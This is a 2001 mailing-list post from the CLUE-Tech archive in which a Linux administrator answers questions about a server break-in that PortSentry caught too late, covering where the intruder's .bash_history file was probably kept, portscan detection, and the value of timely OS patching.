[CLUE-Tech] Fwd: Re: blitznet crack attack
Dan Harris
coronadh at coronasolutions.com
Fri Jun 15 09:13:01 MDT 2001
WOW, that's some good info, Jim. Thanks for sharing it.
What I find interesting is that this cracker went directly to the exploit
instead of portscanning the box first. If he/she had portscanned it,
portsentry would have done its job and dropped the IP. I guess this just
proves that the #1 most important security measure is to stay up to date
with OS patches!
For #1, my guess would be that it was in /root/. The logs show su sessions
being opened, so that looks like the account that was used to do all the
chmod's and install of the rootkit.
#2, most of the time, there will be nothing to check, as 99% of all script
kiddies will do a portscan first, looking for vulnerable ports. Portsentry
will block them before they ever get to a shell.
#3, I'm not up to speed with proxies, so hopefully someone else will add
some insight here...
-Dan Harris
> Greetings All,
>
> Interesting post/info on the PortSentry mailist (see what follows) re:
> another successfull crack that PortSentry caught after the fact (the
> damage was done).
>
> For Discussion:
>
> 1) .bash_history that is being reviewed in the post... would that file
> be located in the /home/daemon directory, root user directoy of what?
>
> 2) If PortSentry posts an AttackAlert, what/where .bash_history files
> should be viewed and inspected to see what the cracker was up to?
>
> 3) I've seen attempts on my own system via port 1080. This is used by
> servers running as proxy servers, yes?
>
> Bonus Questions: What did the cracker do, and how did he get in? How
> could this have been prevented?
>
> -JimI.
>
> Jim Intriglia
> IT Systems and Software Developer
> www.JimIntriglia.com
>
More information about the clue-tech
mailing list